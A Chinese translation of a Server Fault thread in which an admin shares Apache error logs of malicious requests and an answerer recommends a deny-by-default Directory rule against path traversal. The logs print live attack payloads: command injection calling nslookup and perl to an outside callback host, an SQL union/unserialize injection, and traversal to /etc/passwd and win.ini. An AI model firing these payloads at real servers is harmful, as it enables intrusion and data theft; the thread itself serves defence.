Security

提高 apache2 的安全性

  • November 3, 2020

我已經分析了我的伺服器日誌一個星期,我發現了惡意請求,我想知道是否可以保護它,因為我不知道我應該做什麼,我唯一的想法是創建一個 .htaccess規則來阻止伺服器請求中的某些單詞,例如gethostbyname,但我不知道它是否有效

[Tue Nov 03 04:14:53.839367 2020] [core:error] [pid 467:tid 140016219035392] (36)File name too long: [client 164.68.125.18:17324] AH00036: access to /;(nslookup hituqvvdoessp277d4.bxss.me||perl -e "gethostbyname('hituqvvdoessp277d4.bxss.me')")|(nslookup hituqvvdoessp277d4.bxss.me||perl -e "gethostbyname('hituqvvdoessp277d4.bxss.me')")&(nslookup hituqvvdoessp277d4.bxss.me||perl -e "gethostbyname('hituqvvdoessp277d4.bxss.me')")/purchase-saq/ failed (filesystem path '/var/www/master/;(nslookup hituqvvdoessp277d4.bxss.me||perl -e "gethostbyname('hituqvvdoessp277d4.bxss.me')")|(nslookup hituqvvdoessp277d4.bxss.me||perl -e "gethostbyname('hituqvvdoessp277d4.bxss.me')")&(nslookup hituqvvdoessp277d4.bxss.me||perl -e "gethostbyname('hituqvvdoessp277d4.bxss.me')")')

[Tue Nov 03 02:08:23.783130 2020] [proxy_fcgi:error] [pid 470:tid 140015933847296] [client 172.28.116.14:44214] AH01071: Got error 'Primary script unknown\n'

[Tue Nov 03 07:10:02.996899 2020] [proxy_fcgi:error] [pid 23788:tid 140014927214336] [client 164.68.112.10:5403] AH01071: Got error 'Primary script unknown\n', referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:3:{s:2:"id";s:3:"'/*";s:3:"num";s:141:"*/ union select 1,0x272F2A,3,4,5,6,7,8,0x7b247b24524345275d3b6469652f2a2a2f286d6435284449524543544f52595f534550415241544f5229293b2f2f7d7d,0--";s:4:"name";s:3:"ads";}554fcae493e564ee0dc75bdf2ebf94ca

[Tue Oct 27 19:58:25.368520 2020] [core:error] [pid 29512:tid 140476501980928] [client 3.132.217.50:33028] AH00126: Invalid URI in request GET <meta%20http-equiv=Set-Cookie%20content=%22testjpjn=6754%22> HTTP/1.1

[Tue Oct 27 19:58:25.030965 2020] [core:error] [pid 29507:tid 140476592264960] [client 3.132.217.50:35560] AH00126: Invalid URI in request GET ..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini HTTP/1.1

[Tue Oct 27 19:58:20.439013 2020] [core:error] [pid 29652:tid 140476317406976] [client 3.132.217.50:32968] AH00126: Invalid URI in request GET //../../../../../../../../../../../../etc/passwd HTTP/1.1

[Tue Oct 27 22:10:29.240575 2020] [core:error] [pid 29568:tid 140475990255360] [client 3.132.217.74:47570] AH00126: Invalid URI in request GET ../../../../../../../../../../../../winnt/win.ini HTTP/1.1

請問你能幫幫我嗎?

保護 Apache 是一個很大的話題。有關一些提示,請參閱此答案中的“A”部分。

您的最後 3 條日誌消息是路徑遍歷嘗試,以讀取主機上 Web 根目錄之外的文件。Apache 安全文件中的預設情況下保護伺服器文件建議您預設拒絕對所有文件的訪問:

<Directory "/">
 Require all denied
</Directory>

然後啟用對您想要的文件的訪問。這是一種最佳實踐,可以保護您免受路徑遍歷攻擊。

引用自:https://serverfault.com/questions/1041076